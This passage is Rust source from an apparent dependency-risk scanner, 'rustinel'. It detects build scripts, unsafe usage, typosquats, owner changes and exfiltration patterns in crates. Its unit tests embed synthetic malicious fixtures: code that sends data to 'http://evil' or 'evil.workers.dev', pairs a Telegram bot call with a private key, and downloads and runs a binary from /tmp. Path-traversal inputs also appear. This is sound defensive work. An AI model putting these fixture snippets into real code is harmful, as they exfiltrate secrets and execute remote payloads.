1285 "crate is on the rustinel known-good baseline (ubiquitous platform/ecosystem crate); not counted toward risk",
1286 ));
1287 }
1288 }
1289}
1290
1291fn collect_source_signals(
1293 lock: &LockfileModel,
1294 source_root: &Path,
1295 signals: &mut Vec<RiskSignal>,
1296) -> Result<(), RustinelError> {
1297 for package in lock.registry_packages() {
1298 let Some(crate_dir) = locate_crate_dir(source_root, package) else {
1299 continue;
1300 };
1301
1302 let build_rs = crate_dir.join("build.rs");
1304 if build_rs.is_file() {
1305 signals.push(RiskSignal {
1306 id: "build_script_present".into(),
1307 package: package.id.to_string(),
1308 severity: Severity::Low,
1311 weight: 2,
1312 confidence: 0.95,
1313 evidence: vec![Evidence::with_path(
1314 "file",
1315 rel_display(source_root, &build_rs),
1316 "build.rs exists; the file was inspected statically and never executed",
1317 )],
1318 recommendation: "Review the build script before merging.".into(),
1319 });
1320
1321 if let Some(content) =
1326 crate::safety::read_file_capped(&build_rs, crate::safety::MAX_SOURCE_FILE_BYTES)
1327 {
1328 if let Some(sig) = build_script_intent_signal(
1329 &package.id.to_string(),
1330 &content,
1331 rel_display(source_root, &build_rs),
1332 ) {
1333 signals.push(sig);
1334 }
1335 }
1336 }
1337
1338 let manifest = crate_dir.join("Cargo.toml");
1340 if let Some(meta) = read_manifest(&manifest) {
1341 if let Some(links) = meta.links {
1342 if let Some(existing) = signals
1345 .iter_mut()
1346 .find(|s| s.id == "native_ffi_detected" && s.package == package.id.to_string())
1347 {
1348 existing.severity = Severity::Medium;
1349 existing.weight = 14;
1350 existing.confidence = 0.95;
1351 existing.evidence.push(Evidence::with_path(
1352 "manifest",
1353 rel_display(source_root, &manifest),
1354 format!("manifest declares `links = \"{links}\"`"),
1355 ));
1356 } else {
1357 signals.push(RiskSignal {
1358 id: "native_ffi_detected".into(),
1359 package: package.id.to_string(),
1360 severity: Severity::Medium,
1361 weight: 14,
1362 confidence: 0.9,
1363 evidence: vec![Evidence::with_path(
1364 "manifest",
1365 rel_display(source_root, &manifest),
1366 format!("manifest declares `links = \"{links}\"`"),
1367 )],
1368 recommendation:
1369 "Review the native dependency and its build process before merging."
1370 .into(),
1371 });
1372 }
1373 }
1374
1375 signals.push(license_signal(
1376 package,
1377 meta.license.as_deref(),
1378 &manifest,
1379 source_root,
1380 ));
1381 }
1382
1383 if let Some((stats, sample)) = count_unsafe(&crate_dir) {
1387 if stats.total > 0 {
1388 let (severity, weight) = if stats.total >= 20 {
1389 (Severity::Low, 3)
1390 } else {
1391 (Severity::Low, 1)
1392 };
1393 signals.push(RiskSignal {
1394 id: "unsafe_present".into(),
1395 package: package.id.to_string(),
1396 severity,
1397 weight,
1398 confidence: 0.8,
1399 evidence: vec![Evidence::with_path(
1400 "source",
1401 rel_display(source_root, &sample),
1402 format!(
1403 "{} `unsafe` usage(s) found by static scan (comments and strings ignored). \
1404 Use of `unsafe` is not automatically a vulnerability; it indicates code that warrants review.",
1405 stats.breakdown()
1406 ),
1407 )],
1408 recommendation:
1409 "Confirm that `unsafe` blocks are justified and reviewed. This is informational, not a vulnerability."
1410 .into(),
1411 });
1412 }
1413 }
1414
1415 if let Some(scan) = scan_source_exfil(&crate_dir) {
1420 if let Some(s) = &scan.source_exfil_sample {
1421 signals.push(source_exfil_signal(
1422 &package.id.to_string(),
1423 scan.source_exfil_network,
1424 scan.source_exfil_secrets,
1425 rel_display(source_root, s),
1426 ));
1427 }
1428 if let (Some(domain), Some(s)) = (scan.exfil_domain.as_deref(), &scan.domain_sample) {
1431 signals.push(exfil_domain_signal(
1432 &package.id.to_string(),
1433 domain,
1434 rel_display(source_root, s),
1435 ));
1436 }
1437 if let Some(s) = &scan.env_gated_sample {
1439 signals.push(env_gated_payload_signal(
1440 &package.id.to_string(),
1441 rel_display(source_root, s),
1442 ));
1443 }
1444 }
1445 }
1446 Ok(())
1447}
1448
1449fn license_signal(
1450 package: &Package,
1451 license: Option<&str>,
1452 manifest: &Path,
1453 source_root: &Path,
1454) -> RiskSignal {
1455 match license {
1456 Some(license) => RiskSignal {
1457 id: "license_detected".into(),
1458 package: package.id.to_string(),
1459 severity: Severity::Info,
1460 weight: 0,
1461 confidence: 1.0,
1462 evidence: vec![Evidence::with_path(
1463 "manifest",
1464 rel_display(source_root, manifest),
1465 format!("declared license: {license}"),
1466 )],
1467 recommendation: "Confirm the license is allowed by your organization policy.".into(),
1468 },
1469 None => RiskSignal {
1470 id: "license_unknown".into(),
1471 package: package.id.to_string(),
1472 severity: Severity::Low,
1473 weight: 4,
1474 confidence: 0.9,
1475 evidence: vec![Evidence::with_path(
1476 "manifest",
1477 rel_display(source_root, manifest),
1478 "no `license` or `license-file` field found in the manifest",
1479 )],
1480 recommendation: "Determine the crate's license before depending on it.".into(),
1481 },
1482 }
1483}
1484
/// The fields of a manifest's `[package]` table that `read_manifest` extracts.
struct ManifestMeta {
    /// String value of the `links` key, if present.
    links: Option<String>,
    /// String value of the `license` key; when that is absent, the
    /// `license-file` value rendered as `file:<value>`. `None` if neither
    /// key holds a string.
    license: Option<String>,
}
1490
1491fn read_manifest(path: &Path) -> Option<ManifestMeta> {
1492 let content = crate::safety::read_file_capped(path, crate::safety::MAX_SOURCE_FILE_BYTES)?;
1493 let value: toml::Value = toml::from_str(&content).ok()?;
1494 let package = value.get("package")?;
1495 let links = package
1496 .get("links")
1497 .and_then(|v| v.as_str())
1498 .map(|s| s.to_string());
1499 let license = package
1500 .get("license")
1501 .and_then(|v| v.as_str())
1502 .map(|s| s.to_string())
1503 .or_else(|| {
1504 package
1505 .get("license-file")
1506 .and_then(|v| v.as_str())
1507 .map(|f| format!("file:{f}"))
1508 });
1509 Some(ManifestMeta { links, license })
1510}
1511
1512fn count_unsafe(crate_dir: &Path) -> Option<(UnsafeStats, PathBuf)> {
1519 use crate::safety::{MAX_DIR_DEPTH, MAX_DIR_ENTRIES, MAX_SOURCE_FILE_BYTES};
1520
1521 let mut total = UnsafeStats::default();
1522 let mut sample: Option<PathBuf> = None;
1523 let mut stack: Vec<(PathBuf, usize)> = if crate_dir.join("src").is_dir() {
1525 vec![(crate_dir.join("src"), 0)]
1526 } else {
1527 vec![(crate_dir.to_path_buf(), 0)]
1528 };
1529
1530 let mut visited = 0usize;
1531 while let Some((dir, depth)) = stack.pop() {
1532 for entry in sorted_dir_entries(&dir) {
1533 if visited >= MAX_DIR_ENTRIES {
1534 return sample.map(|s| (total, s));
1535 }
1536 visited += 1;
1537 let Ok(ft) = entry.file_type() else { continue };
1539 if ft.is_symlink() {
1540 continue; }
1542 let path = entry.path();
1543 if ft.is_dir() {
1544 if depth < MAX_DIR_DEPTH {
1545 stack.push((path, depth + 1));
1546 }
1547 continue;
1548 }
1549 if ft.is_file() && path.extension().and_then(|e| e.to_str()) == Some("rs") {
1550 if let Some(content) = crate::safety::read_file_capped(&path, MAX_SOURCE_FILE_BYTES)
1551 {
1552 let stats = scan_unsafe(&content);
1553 if stats.total > 0 {
1554 if sample.is_none() {
1555 sample = Some(path.clone());
1556 }
1557 total.add(&stats);
1558 }
1559 }
1560 }
1561 }
1562 }
1563 sample.map(|s| (total, s))
1564}
1565
/// Tally of `unsafe` keyword occurrences, overall and per category.
#[derive(Debug, Default, Clone, Copy)]
pub(crate) struct UnsafeStats {
    /// Every counted `unsafe` keyword.
    total: usize,
    /// Occurrences followed by `fn`.
    fns: usize,
    /// Occurrences followed by `impl`.
    impls: usize,
    /// Occurrences followed by `trait`.
    traits: usize,
    /// Occurrences that fit none of the categories above.
    blocks: usize,
}

impl UnsafeStats {
    /// Adds every counter of `o` onto the matching counter of `self`.
    fn add(&mut self, o: &UnsafeStats) {
        let UnsafeStats {
            total,
            fns,
            impls,
            traits,
            blocks,
        } = *o;
        self.total += total;
        self.fns += fns;
        self.impls += impls;
        self.traits += traits;
        self.blocks += blocks;
    }

    /// Renders the tally as `"<total>"`, or as `"<total> (<n> fn, <n> impl, …)"`
    /// listing only the non-zero categories in fn, impl, trait, block order.
    fn breakdown(&self) -> String {
        let categories = [
            (self.fns, "fn"),
            (self.impls, "impl"),
            (self.traits, "trait"),
            (self.blocks, "block"),
        ];
        let detail: Vec<String> = categories
            .iter()
            .filter(|(count, _)| *count > 0)
            .map(|(count, label)| format!("{} {}", count, label))
            .collect();

        match detail.is_empty() {
            true => self.total.to_string(),
            false => format!("{} ({})", self.total, detail.join(", ")),
        }
    }
}
1608
1609pub(crate) fn scan_unsafe(src: &str) -> UnsafeStats {
1617 let b = src.as_bytes();
1618 let n = b.len();
1619 let mut stats = UnsafeStats::default();
1620 let mut i = 0;
1621
1622 enum State {
1623 Normal,
1624 Line,
1625 Block(usize),
1626 Str,
1627 Raw(usize),
1628 }
1629 let mut st = State::Normal;
1630
1631 while i < n {
1632 match st {
1633 State::Normal => {
1634 if b[i] == b'/' && i + 1 < n && b[i + 1] == b'/' {
1635 st = State::Line;
1636 i += 2;
1637 } else if b[i] == b'/' && i + 1 < n && b[i + 1] == b'*' {
1638 st = State::Block(1);
1639 i += 2;
1640 } else if let Some((hashes, skip)) = raw_string_start(b, i) {
1641 st = State::Raw(hashes);
1642 i += skip;
1643 } else if b[i] == b'"' {
1644 st = State::Str;
1645 i += 1;
1646 } else if b[i] == b'\'' {
1647 i += char_literal_len(b, i); } else if b[i] == b'u' && matches_unsafe(b, i) {
1649 stats.total += 1;
1650 categorize(b, i + 6, &mut stats);
1651 i += 6;
1652 } else {
1653 i += 1;
1654 }
1655 }
1656 State::Line => {
1657 if b[i] == b'\n' {
1658 st = State::Normal;
1659 }
1660 i += 1;
1661 }
1662 State::Block(d) => {
1663 if b[i] == b'/' && i + 1 < n && b[i + 1] == b'*' {
1664 st = State::Block(d + 1);
1665 i += 2;
1666 } else if b[i] == b'*' && i + 1 < n && b[i + 1] == b'/' {
1667 st = if d == 1 {
1668 State::Normal
1669 } else {
1670 State::Block(d - 1)
1671 };
1672 i += 2;
1673 } else {
1674 i += 1;
1675 }
1676 }
1677 State::Str => {
1678 if b[i] == b'\\' {
1679 i += 2;
1680 } else {
1681 if b[i] == b'"' {
1682 st = State::Normal;
1683 }
1684 i += 1;
1685 }
1686 }
1687 State::Raw(h) => {
1688 if b[i] == b'"' && i + 1 + h <= n && b[i + 1..i + 1 + h].iter().all(|&c| c == b'#')
1689 {
1690 st = State::Normal;
1691 i += 1 + h;
1692 } else {
1693 i += 1;
1694 }
1695 }
1696 }
1697 }
1698 stats
1699}
1700
1701fn matches_unsafe(b: &[u8], i: usize) -> bool {
1703 if i + 6 > b.len() || &b[i..i + 6] != b"unsafe" {
1704 return false;
1705 }
1706 let before_ok = i == 0 || !is_ident_byte(b[i - 1]);
1707 let after_ok = i + 6 >= b.len() || !is_ident_byte(b[i + 6]);
1708 before_ok && after_ok
1709}
1710
1711fn categorize(b: &[u8], mut j: usize, stats: &mut UnsafeStats) {
1713 while j < b.len() && b[j].is_ascii_whitespace() {
1714 j += 1;
1715 }
1716 let starts = |kw: &[u8]| -> bool {
1717 j + kw.len() <= b.len()
1718 && &b[j..j + kw.len()] == kw
1719 && (j + kw.len() == b.len() || !is_ident_byte(b[j + kw.len()]))
1720 };
1721 if starts(b"fn") {
1722 stats.fns += 1;
1723 } else if starts(b"impl") {
1724 stats.impls += 1;
1725 } else if starts(b"trait") {
1726 stats.traits += 1;
1727 } else {
1728 stats.blocks += 1;
1729 }
1730}
1731
1732fn raw_string_start(b: &[u8], i: usize) -> Option<(usize, usize)> {
1735 if i > 0 && is_ident_byte(b[i - 1]) {
1737 return None;
1738 }
1739 let mut p = i;
1740 if b.get(p) == Some(&b'b') {
1741 p += 1; }
1743 if b.get(p) != Some(&b'r') {
1744 return None;
1745 }
1746 p += 1;
1747 let hash_start = p;
1748 while b.get(p) == Some(&b'#') {
1749 p += 1;
1750 }
1751 if b.get(p) == Some(&b'"') {
1752 let hashes = p - hash_start;
1753 Some((hashes, p - i + 1)) } else {
1755 None
1756 }
1757}
1758
/// Returns how many bytes to skip for the `'` at byte `i`.
///
/// When the quote opens a char literal the result is the literal's full
/// length, closing quote included. Otherwise (a lifetime, a loop label, or
/// anything unrecognised) it is `1`, so only the quote itself is skipped.
///
/// Recognised forms:
/// * escapes such as `'\n'`, `'\''`, `'\\'`, `'\u{10FFFF}'`;
/// * a single ASCII byte, e.g. `'a'` or `'"'`;
/// * a single multi-byte UTF-8 character, e.g. `'é'`.
fn char_literal_len(b: &[u8], i: usize) -> usize {
    const QUOTE: u8 = b'\'';
    // The longest escape, `'\u{10FFFF}'`, is 12 bytes including both quotes.
    const MAX_ESCAPED_LEN: usize = 12;

    let Some(&first) = b.get(i + 1) else {
        return 1;
    };

    if first == b'\\' {
        // b[i + 2] is the escaped character itself and can never be the
        // terminator, so the search starts one byte later. Starting on it
        // would end `'\''` one byte early and leave a dangling quote.
        let limit = (i + MAX_ESCAPED_LEN).min(b.len());
        return (i + 3..limit)
            .find(|&p| b[p] == QUOTE)
            .map_or(1, |close| close - i + 1);
    }

    if first == QUOTE {
        // `''` is not a char literal.
        return 1;
    }

    // Width of the character as announced by its UTF-8 lead byte; anything
    // that is not a multi-byte lead is treated as a single byte.
    let width = match first {
        0xC0..=0xDF => 2,
        0xE0..=0xEF => 3,
        0xF0..=0xF7 => 4,
        _ => 1,
    };
    if b.get(i + 1 + width) == Some(&QUOTE) {
        width + 2
    } else {
        1
    }
}
1781
/// True for bytes that may appear inside an ASCII identifier:
/// letters, digits and the underscore.
fn is_ident_byte(b: u8) -> bool {
    matches!(b, b'_' | b'0'..=b'9' | b'a'..=b'z' | b'A'..=b'Z')
}
1785
1786fn locate_crate_dir(source_root: &Path, package: &Package) -> Option<PathBuf> {
1795 use crate::safety::{
1796 is_contained_within, is_safe_crate_name, is_safe_path_segment, is_safe_version,
1797 };
1798
1799 if !is_safe_crate_name(&package.id.name) || !is_safe_version(&package.id.version) {
1800 return None;
1801 }
1802 let dir_name = format!("{}-{}", package.id.name, package.id.version);
1803 if !is_safe_path_segment(&dir_name) {
1804 return None;
1805 }
1806
1807 let verify = |candidate: PathBuf| -> Option<PathBuf> {
1808 let meta = std::fs::symlink_metadata(&candidate).ok()?;
1810 if !meta.file_type().is_dir() {
1811 return None;
1812 }
1813 if is_contained_within(source_root, &candidate) {
1814 Some(candidate)
1815 } else {
1816 None
1817 }
1818 };
1819
1820 if let Some(dir) = verify(source_root.join(&dir_name)) {
1821 return Some(dir);
1822 }
1823 for entry in sorted_dir_entries(source_root) {
1828 let Ok(ft) = entry.file_type() else { continue };
1829 if !ft.is_dir() {
1830 continue; }
1832 if let Some(dir) = verify(entry.path().join(&dir_name)) {
1833 return Some(dir);
1834 }
1835 }
1836 None
1837}
1838
/// Renders `path` for display, relative to `root` when `path` lies beneath
/// it and unchanged otherwise.
fn rel_display(root: &Path, path: &Path) -> String {
    let shown = match path.strip_prefix(root) {
        Ok(relative) => relative,
        Err(_) => path,
    };
    shown.display().to_string()
}
1845
// Unit tests for the signal collectors and the source-scanning helpers.
#[cfg(test)]
mod tests {
    use super::*;
    use crate::lockfile::PackageId;

    // Builds a package with no checksum and no dependencies. `local` yields a
    // source-less id; otherwise the crates.io registry source is used.
    fn pkg(name: &str, version: &str, local: bool) -> Package {
        Package {
            id: PackageId {
                name: name.into(),
                version: version.into(),
                source: if local {
                    None
                } else {
                    Some("registry+https://github.com/rust-lang/crates.io-index".into())
                },
            },
            checksum: None,
            dependencies: vec![],
        }
    }

    // Wraps packages in a version-3 lockfile model with a placeholder path.
    fn lock(packages: Vec<Package>) -> LockfileModel {
        LockfileModel {
            path: PathBuf::from("Cargo.lock"),
            version: Some(3),
            packages,
        }
    }

    // Default options carrying the given `key -> metadata` entries.
    fn opts_with_meta(pairs: &[(&str, crate::CrateMetadata)]) -> AnalysisOptions {
        let mut metadata = std::collections::BTreeMap::new();
        for (k, m) in pairs {
            metadata.insert((*k).to_string(), m.clone());
        }
        AnalysisOptions {
            metadata,
            ..Default::default()
        }
    }

    // A high download count must suppress the typosquat signal.
    #[test]
    fn typosquat_cleared_by_high_downloads() {
        let lk = lock(vec![pkg("miow", "0.6.1", false)]);
        let opts = opts_with_meta(&[(
            "miow@0.6.1",
            crate::CrateMetadata {
                total_downloads: Some(53_000_000),
                ..Default::default()
            },
        )]);
        let mut sig = vec![];
        collect_typosquat(&lk, &opts, &mut sig);
        assert!(
            sig.iter().all(|s| s.id != "possible_typosquat"),
            "established crate must not be flagged as a typosquat"
        );
    }

    // The same name with a tiny download count is flagged at Medium.
    #[test]
    fn typosquat_flagged_when_obscure() {
        let lk = lock(vec![pkg("miow", "0.0.1", false)]);
        let opts = opts_with_meta(&[(
            "miow@0.0.1",
            crate::CrateMetadata {
                total_downloads: Some(42),
                ..Default::default()
            },
        )]);
        let mut sig = vec![];
        collect_typosquat(&lk, &opts, &mut sig);
        let f = sig
            .iter()
            .find(|s| s.id == "possible_typosquat")
            .expect("obscure look-alike must be flagged");
        assert_eq!(f.severity, Severity::Medium);
    }

    // With no metadata at all the signal is still emitted, but only as Info.
    #[test]
    fn typosquat_offline_is_quiet_info() {
        let lk = lock(vec![pkg("miow", "0.6.1", false)]);
        let opts = AnalysisOptions::default();
        let mut sig = vec![];
        collect_typosquat(&lk, &opts, &mut sig);
        let f = sig
            .iter()
            .find(|s| s.id == "possible_typosquat")
            .expect("offline hint present");
        assert_eq!(f.severity, Severity::Info);
    }

    // A version published 3 days ago is flagged; one 400 days old is not.
    #[test]
    fn freshness_flags_only_recent_versions() {
        let lk = lock(vec![pkg("somecrate", "1.0.0", false)]);
        let fresh = opts_with_meta(&[(
            "somecrate@1.0.0",
            crate::CrateMetadata {
                published_days_ago: Some(3),
                ..Default::default()
            },
        )]);
        let mut sig = vec![];
        collect_freshness(&lk, &fresh, &mut sig);
        assert_eq!(
            sig.iter().filter(|s| s.id == "freshly_published").count(),
            1,
            "a 3-day-old version must be flagged fresh"
        );

        let old = opts_with_meta(&[(
            "somecrate@1.0.0",
            crate::CrateMetadata {
                published_days_ago: Some(400),
                ..Default::default()
            },
        )]);
        let mut sig2 = vec![];
        collect_freshness(&lk, &old, &mut sig2);
        assert!(sig2.is_empty(), "an old version must not be flagged fresh");
    }

    // Options with current owners (`meta`, keyed `name@version`) and a trusted
    // owner baseline (`trusted`, keyed by crate name).
    fn opts_with_owners(meta: &[(&str, &[&str])], trusted: &[(&str, &[&str])]) -> AnalysisOptions {
        let mut metadata = std::collections::BTreeMap::new();
        for (k, owners) in meta {
            metadata.insert(
                (*k).to_string(),
                crate::CrateMetadata {
                    owners: owners.iter().map(|s| s.to_string()).collect(),
                    ..Default::default()
                },
            );
        }
        let mut trusted_owners = std::collections::BTreeMap::new();
        for (k, owners) in trusted {
            trusted_owners.insert(
                (*k).to_string(),
                owners.iter().map(|s| s.to_string()).collect(),
            );
        }
        AnalysisOptions {
            metadata,
            trusted_owners,
            ..Default::default()
        }
    }

    // An owner missing from the trusted baseline is reported, by name, at Medium.
    #[test]
    fn owners_changed_flags_new_maintainer() {
        let lk = lock(vec![pkg("xz2", "0.1.7", false)]);
        let opts = opts_with_owners(
            &[("xz2@0.1.7", &["Lasse", "JiaT75"])],
            &[("xz2", &["Lasse"])],
        );
        let mut sig = vec![];
        collect_owners_changed(&lk, &opts, &mut sig);
        let f = sig
            .iter()
            .find(|s| s.id == "owners_changed")
            .expect("a new maintainer must be flagged");
        assert_eq!(f.severity, Severity::Medium);
        assert!(f.evidence[0].summary.contains("JiaT75"));
    }

    // Owners identical to the baseline produce no signal.
    #[test]
    fn owners_unchanged_emits_nothing() {
        let lk = lock(vec![pkg("serde", "1.0.0", false)]);
        let opts = opts_with_owners(&[("serde@1.0.0", &["dtolnay"])], &[("serde", &["dtolnay"])]);
        let mut sig = vec![];
        collect_owners_changed(&lk, &opts, &mut sig);
        assert!(sig.is_empty(), "unchanged owners must not be flagged");
    }

    // Without a trusted baseline there is nothing to compare against.
    #[test]
    fn owners_without_baseline_emits_nothing() {
        let lk = lock(vec![pkg("serde", "1.0.0", false)]);
        let opts = opts_with_owners(&[("serde@1.0.0", &["newowner"])], &[]);
        let mut sig = vec![];
        collect_owners_changed(&lk, &opts, &mut sig);
        assert!(sig.is_empty(), "no baseline -> no signal");
    }

    // Runs the full pipeline: an ownership change on a known-good crate must
    // keep its Medium severity and a non-zero weight.
    #[test]
    fn owners_changed_survives_known_good_baseline() {
        assert!(is_known_good("libc"), "test premise: libc is known-good");
        let lk = lock(vec![pkg("libc", "0.2.0", false)]);
        let opts = opts_with_owners(
            &[("libc@0.2.0", &["alice", "mallory"])],
            &[("libc", &["alice"])],
        );
        let signals = collect_basic_signals(&lk, &opts).unwrap();
        let f = signals
            .iter()
            .find(|s| s.id == "owners_changed")
            .expect("owners_changed present");
        assert_eq!(
            f.severity,
            Severity::Medium,
            "ownership change must survive the known-good baseline"
        );
        assert!(f.weight > 0, "must still count toward risk");
    }

    // Two versions are locked but only the second has owner metadata; the
    // change must still be reported exactly once.
    #[test]
    fn owners_changed_detected_on_later_version_without_first_metadata() {
        let lk = lock(vec![
            pkg("foo-crate", "1.0.0", false),
            pkg("foo-crate", "2.0.0", false),
        ]);
        let opts = opts_with_owners(
            &[("foo-crate@2.0.0", &["alice", "newowner"])],
            &[("foo-crate", &["alice"])],
        );
        let mut sig = vec![];
        collect_owners_changed(&lk, &opts, &mut sig);
        assert_eq!(
            sig.iter().filter(|s| s.id == "owners_changed").count(),
            1,
            "ownership change on a non-first version must be detected"
        );
    }

    // Names or versions containing path separators or `..` must never resolve
    // to a directory.
    #[test]
    fn locate_crate_dir_rejects_path_traversal() {
        let root = std::env::temp_dir();
        for evil in ["../../etc", "..", "foo/bar", "a/../../b"] {
            let p = pkg(evil, "1.0.0", false);
            assert!(
                locate_crate_dir(&root, &p).is_none(),
                "traversal name {evil:?} must be refused"
            );
        }
        let p = pkg("serde", "../../etc", false);
        assert!(locate_crate_dir(&root, &p).is_none());
    }

    // A registry crate named `*-sys` gets a Low native-FFI signal with
    // confidence of at least 0.5.
    #[test]
    fn detects_native_ffi_by_name() {
        let model = lock(vec![pkg("openssl-sys", "0.9.99", false)]);
        let mut signals = vec![];
        collect_name_heuristics(&model, &mut signals);
        assert!(signals.iter().any(|s| s.id == "native_ffi_detected"));
        let s = signals
            .iter()
            .find(|s| s.id == "native_ffi_detected")
            .unwrap();
        assert_eq!(s.severity, Severity::Low);
        assert!(s.confidence >= 0.5);
    }

    // For a known-good crate the FFI signal is kept but reduced to Info with
    // weight 0, and gains a `baseline` evidence entry.
    #[test]
    fn known_good_crate_downgraded_to_baseline() {
        let model = lock(vec![pkg("windows-sys", "0.61.2", false)]);
        let signals = collect_basic_signals(&model, &AnalysisOptions::default()).unwrap();
        let ffi = signals
            .iter()
            .find(|s| s.id == "native_ffi_detected")
            .expect("signal kept for transparency");
        assert_eq!(ffi.severity, Severity::Info);
        assert_eq!(ffi.weight, 0);
        assert!(ffi.evidence.iter().any(|e| e.kind == "baseline"));
        assert!(is_known_good("windows-sys"));
        assert!(!is_known_good("openssl-sys"));
    }

    // A source-less (local) package is exempt from the name heuristics.
    #[test]
    fn local_crate_not_flagged_for_ffi() {
        let model = lock(vec![pkg("my-app-sys", "0.1.0", true)]);
        let mut signals = vec![];
        collect_name_heuristics(&model, &mut signals);
        assert!(signals.is_empty());
    }

    // Identity, substitution, transposition and deletion each cost the
    // expected distance; a long suffix costs its length.
    #[test]
    fn damerau_levenshtein_basics() {
        assert_eq!(damerau_levenshtein("serde", "serde"), 0);
        assert_eq!(damerau_levenshtein("serde", "serdf"), 1);
        assert_eq!(damerau_levenshtein("tokio", "tokoi"), 1);
        assert_eq!(damerau_levenshtein("reqwest", "reqwes"), 1);
        assert_eq!(damerau_levenshtein("serde", "serde_json"), 5);
    }

    // `reqwset` must be reported with `reqwest` named in the evidence.
    #[test]
    fn detects_typosquat_one_edit_away() {
        let model = lock(vec![pkg("reqwset", "1.0.0", false)]);
        let mut signals = vec![];
        collect_typosquat(&model, &AnalysisOptions::default(), &mut signals);
        let s = signals
            .iter()
            .find(|s| s.id == "possible_typosquat")
            .unwrap();
        assert!(s.evidence[0].summary.contains("reqwest"));
    }

    // None of these names may produce a typosquat signal.
    #[test]
    fn does_not_flag_legitimate_crates() {
        let model = lock(vec![
            pkg("serde_json", "1.0.0", false),
            pkg("tokio-util", "0.7.0", false),
            pkg("my-app-utils", "0.1.0", false),
            pkg("serde", "1.0.0", false),
        ]);
        let mut signals = vec![];
        collect_typosquat(&model, &AnalysisOptions::default(), &mut signals);
        assert!(signals.is_empty(), "false positives: {signals:?}");
    }

    // Short legitimate names must not be reported either.
    #[test]
    fn legit_lookalikes_are_not_typosquats() {
        let model = lock(vec![
            pkg("mime", "0.3.17", false),
            pkg("md-5", "0.10.6", false),
            pkg("anes", "0.1.6", false),
        ]);
        let mut signals = vec![];
        collect_typosquat(&model, &AnalysisOptions::default(), &mut signals);
        assert!(signals.is_empty(), "false positives: {signals:?}");
    }

    // Creates a fresh scratch crate under the temp dir with the given files
    // written beneath `src/`, and returns its root. The directory name
    // combines `tag`, the process id and the file count; any previous
    // directory of that name is removed first.
    fn scratch_crate(tag: &str, files: &[(&str, &str)]) -> PathBuf {
        let root = std::env::temp_dir().join(format!(
            "rustinel_exfil_{}_{}_{}",
            tag,
            std::process::id(),
            files.len()
        ));
        let _ = std::fs::remove_dir_all(&root);
        std::fs::create_dir_all(root.join("src")).unwrap();
        for (rel, body) in files {
            let p = root.join("src").join(rel);
            if let Some(parent) = p.parent() {
                std::fs::create_dir_all(parent).unwrap();
            }
            std::fs::write(&p, body).unwrap();
        }
        root
    }

    // Checks the signal id and severity, and that the evidence wording follows
    // the secrets / network flags.
    #[test]
    fn source_exfil_signal_builds_high() {
        let sig = source_exfil_signal("x@1", false, true, "lib.rs".into());
        assert_eq!(sig.id, "suspicious_source_exfil");
        assert_eq!(sig.severity, Severity::High);
        assert!(sig
            .evidence
            .iter()
            .any(|e| e.summary.contains("wallet/private-key")));
        let sig = source_exfil_signal("x@1", true, false, "lib.rs".into());
        assert!(sig
            .evidence
            .iter()
            .any(|e| e.summary.contains("exfiltrates over the network")));
    }

    // Directory scanning and network access only count as exfiltration when
    // both occur in the same file.
    #[test]
    fn source_exfil_conjunction_must_hold_in_one_file() {
        // Scanning alone: no sample.
        let only_scan = scratch_crate(
            "scan",
            &[(
                "codegen.rs",
                "let _ = std::fs::read_dir(\".\"); let x = \".rs\";",
            )],
        );
        assert!(scan_source_exfil(&only_scan)
            .and_then(|s| s.source_exfil_sample)
            .is_none());
        let _ = std::fs::remove_dir_all(&only_scan);

        // Scanning and network in different files: still no sample.
        let cross = scratch_crate(
            "cross",
            &[
                (
                    "codegen.rs",
                    "fn g(){ let _=std::fs::read_dir(\".\"); let _=\".rs\"; }",
                ),
                (
                    "client.rs",
                    "fn f(){ let _ = reqwest::blocking::get(\"http://x\"); }",
                ),
            ],
        );
        assert!(
            scan_source_exfil(&cross)
                .and_then(|s| s.source_exfil_sample)
                .is_none(),
            "cross-file scan + network must NOT fire (benign codegen + HTTP client)"
        );
        let _ = std::fs::remove_dir_all(&cross);

        // Both in one file: flagged, with the network flag set.
        let bad = scratch_crate(
            "bad",
            &[(
                "steal.rs",
                "fn s(){ for e in std::fs::read_dir(\".\").unwrap(){ let _=\".rs\"; \
 let _=reqwest::blocking::get(\"http://evil\"); } }",
            )],
        );
        let scan = scan_source_exfil(&bad).expect("scan");
        assert!(
            scan.source_exfil_sample.is_some(),
            "single-file scan+network IS the fingerprint"
        );
        assert!(scan.source_exfil_network);
        let _ = std::fs::remove_dir_all(&bad);
    }

    // Env check, download and process spawn are flagged when adjacent, but not
    // when separated by 80 filler lines each.
    #[test]
    fn env_gated_requires_causal_proximity() {
        let tight = "fn run() {\n if std::env::var(\"GITLAB_CI\").is_ok() {\n \
 let _ = reqwest::blocking::get(\"http://x/p.bin\");\n \
 std::process::Command::new(\"/tmp/p.bin\").status();\n }\n}\n";
        assert!(
            env_gated_block(tight),
            "tight download-and-execute must be flagged"
        );

        let mut scattered = String::from("let _cfg = std::env::var(\"APP_RPC\");\n");
        scattered.push_str(&"// unrelated code\n".repeat(80));
        scattered.push_str("let _ = reqwest::blocking::get(\"https://rpc.example\");\n");
        scattered.push_str(&"// unrelated code\n".repeat(80));
        scattered.push_str("std::process::Command::new(resolve_cargo_binary()).status();\n");
        assert!(
            !env_gated_block(&scattered),
            "unrelated env/network/spawn scattered across a large file must NOT be flagged"
        );
    }

    // A Telegram API URL alone is not reported and needs secret handling next
    // to it; a `workers.dev` host is reported on its own.
    #[test]
    fn dual_use_service_domain_needs_secret_corroboration() {
        let benign = scratch_crate(
            "tg_benign",
            &[(
                "lib.rs",
                "pub fn send(){ let _=reqwest::blocking::get(\"https://api.telegram.org/bot1/sendMessage\"); }",
            )],
        );
        assert!(
            scan_source_exfil(&benign)
                .and_then(|s| s.exfil_domain)
                .is_none(),
            "a telegram crate must not trip the domain signal without the exfil shape"
        );
        let _ = std::fs::remove_dir_all(&benign);

        let exfil = scratch_crate(
            "tg_exfil",
            &[(
                "lib.rs",
                "pub fn steal(){ let _k=\"private_key\"; let _=reqwest::blocking::get(\"https://api.telegram.org/bot/x\"); }",
            )],
        );
        assert!(
            scan_source_exfil(&exfil)
                .and_then(|s| s.exfil_domain)
                .is_some(),
            "telegram + secret handling IS the exfil shape"
        );
        let _ = std::fs::remove_dir_all(&exfil);

        let host = scratch_crate(
            "cf_exfil",
            &[(
                "lib.rs",
                "pub fn x(){ let _=reqwest::blocking::get(\"https://evil.workers.dev/c\"); }",
            )],
        );
        assert!(
            scan_source_exfil(&host)
                .and_then(|s| s.exfil_domain)
                .is_some(),
            "a pure exfil host is suspicious on its own"
        );
        let _ = std::fs::remove_dir_all(&host);
    }

